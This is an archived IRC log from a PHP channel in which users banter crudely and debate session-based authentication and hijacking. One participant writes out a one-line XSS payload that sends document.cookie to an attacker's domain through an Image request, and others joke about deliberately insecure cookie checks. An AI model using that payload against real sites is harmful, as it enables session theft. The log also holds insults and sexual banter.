| |
| |
| |
|
Page: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
Comments:
<0> omg, can I have your e-mail address?
<0> do you have a naked pix?
<1> can you be quiet ?
<0> I'm quiet
<1> good
<0> promise
<1> Now is there anyone who can help me out with a lil' php script ?
<0> lol
<0> :D
<0> got the point?
<0> so, what was your name again?
<1> you should ask your mom that
<1> retard..
<2> Hah, I was reading a user auth tutorial, and look at these two lines, how ****ing pointless....
<2> $LOGGED_IN=false;
<2> unset($LOGGED_IN);
<2> WTF?
<0> lol
<0> is that for real?
<0> he wanned to make sure :P
<0> paranoic programmer
<0> :))
<2> Ya, thats too funny.
<2> http://www.phpbuilder.com/columns/tim20000505.php3?print_mode=1
<2> Look at the first two lines.
<2> Man, I skimmed like 10 tutorials on the topic and not a single one had a coherent way of doing it.
<0> hehe
<0> and he put his picture next to them :))
<2> I just do all my authentication in my global config include and override weather its needed or not with some define()'s
<2> define('AUTH_REQUIRED', true);
<0> hmm never thought about it
<0> good point
<2> I used to put it in a $config array, but I'm moving past that now.
<2> I just dont like the idea of some programmer down the line ****ing up the config array then b0rking the system.
<3> dravine
<2> One typo and BOOM.
<3> doh
<2> Whats up DEWEZ
<2> How do you deal with your user auth?
<3> needed to ask dravine about his imageshow idea
<3> i have apache2 now
<2> Whats imageshow?
<3> and i need the processes to run under apache
<3> my user auth? how do you mean?
<0> I auth them on a page
<2> Do you have a global include, or do you do auth on a per page basis?
<3> they login, and i have a session cl***
<3> and each page checks the session
<0> same here
<3> well, only on the member ones
<2> Do you check in the page, or in a global include?
<0> _PhAnTaSm way is better tho
<3> i put it in the header
<2> Gotcha.
<3> better that way
<2> I was considering defining weither a page was authed or not in the db.
<2> That way it could be manupliated by the admin.
<3> hmm why?
<2> Thats a good question.
<0> I'm the admin :P
<3> i only have like 2,000 users
<2> Its probally not the best idea, because then they could turn auth off for somthing that requires it and BOOM.
<3> but i have around 1400 people on the site at a given time
<0> best auth method: if (isset($_COOKIE['LoggedIn'])) $loggedin = TRUE; :D
<3> na
<2> haha
<0> do you know a better way? :P
<2> Even better... if(isset($_COOKIE)) { $is_admin = true; }
<0> heh
<2> ;)
<2> Accually I used to store UID and MD5-P*** in a cookie...
<2> Now its just a session id, and session key.
<2> My session system is nearly impossible to hijack.
<2> Unless someone has direct access to someone elses cookies.
<0> well... the user has to send the session back with every call
<0> so it can be sniffed
<2> And even then, the second there are two attempts to request a page with the same session ID and differnt key's the session gets distroyed and email alerts are sent.
<2> Well it can be sniffed if its not an SSL cookie.
<2> My session system uses a random rotating key.
<2> At each page request the cookie is sent, session id and key validated, key rotated.
<2> The moment a session id is found w/o a valid key, the sesion is destroyed and alerts get sent out everywhere.
<2> I've only had one alert in 3 years that i've been running this system.
<2> It was from a stupid proxyserver.
<2> It wasn't relaying cookies properly.
<0> that's the point :P
<0> nobody tryes to hack it
<2> Its impossible *to* hack.
<2> Its based on the same premise as time based p***words.
<0> of course it's possible
<0> they're both cookies, right?
<2> Unless you guess the exact session id and the exact key at the same time, you wont be able to hijack a session.
<0> ok, let's put it this way
<2> Which with a 32bit session id and key is like 10000000000000000000000000000000000000 to 1.
<0> you're reseting them on every request
<2> Right.
<0> the user HAS TO HAVE the current key, right?
<2> Yes.
<0> the current pair
<2> Right.
<0> ok, do they have a place where they could interract with eachother?
<2> What do you mean interact?
<0> talk, post something that others can read
<2> No, no one but the client or the server see either the key or the session id.
<0> supposing they do have a forum
<0> no, I'm talking about something else
<0> let's say I can inject some small js in your forum
<2> Are you talking about brute forcing a login?
<0> no
<4> http://www.bearcavecc.com/windows.jpg <---SWEET
<2> Or XSS?
<4> windows is a whole lot purdier
<0> what if I do var x = new Image; x.src = "mydomain" + escape(document.cookie);
<0> when I get the cookie I access a page using it
<0> now I own the session
<2> sk8ing, I follow ya, ya I mean if the developers open it up to an XSS volnerabilty then sure someone coudl steal the session ID.
<2> Right, but even in that case, the moment the original user hits refresh, the session and key wont revalidate, and the session will be distroyed thus killing both the authed user and the stolen session.
<2> But ya XSS is a real problem with any website.
<0> yeah, that's a good feature
<0> I know, that would be the problem with any session :)
<5> PapaBear: what's the sweet part ?
<2> I hear ya sk8ing.
<4> novell, its purdy :D
<2> Ya its a serious issue... even somthing as harmless as [img]http://domain.com/image.jpg[/img] can be a *real* problem.
<0> I know :)
<2> In that case it can be exploited by forcing the already authenticated clients to do as you bid.
<2> Thats a second reason why no important actions can take place with get's on our site.
<2> Anything important must run through a post.
<2> But you could certinally take advantage of anyone thats also authenticated at any other website also.
<2> Its impossible to protect yourself against due to the nature of browsers.
<2> What we do on our form is force image hosting.
<2> Users want an image, they must upload it.
<2> We then validate the hell out of it.
<2> s/form/forum
<0> hehe
<2> I think vBullitin does somthign simular.
<2> Naturally phpBB is still highly volnerable.
<5> PapaBear: when, except for making screenshots, will you really use transparency or will it be useful ?
<2> Trust me, I did lots of 'fun' things before I became a 'professional'. ;)
<5> _PhAnTaSm: gone from cracker to security researcher ? =P
<0> haha
<2> Not security researcher, just corporate suit.
<2> Heh, all the way back in the war dialing days.
<2> We were so leet with our 1200baud.
<2> A wopping 1.17k/sec
<0> hi speed connection :P
<0> high
<2> Hells ya, I could download a porn jpeg in like under 7 hours... at even 8bit!, it was hot.
<2> All my friends and I would sit around and play, where are the nipple pixels.
<6> how i can set access to file in fer manager?
<0> lol
Return to
#php
or
Go to some related
logs:
akamaitechnologies.net
#linux
#AllNiteCafe
#networking
#skype
chatZone Thai
broken pipe tightvnc firewall
dcc+centos+rpm
Which is colder, minus 40 degrees centigrade or minus 40 degrees fahrenheit ?
#linux
|
|
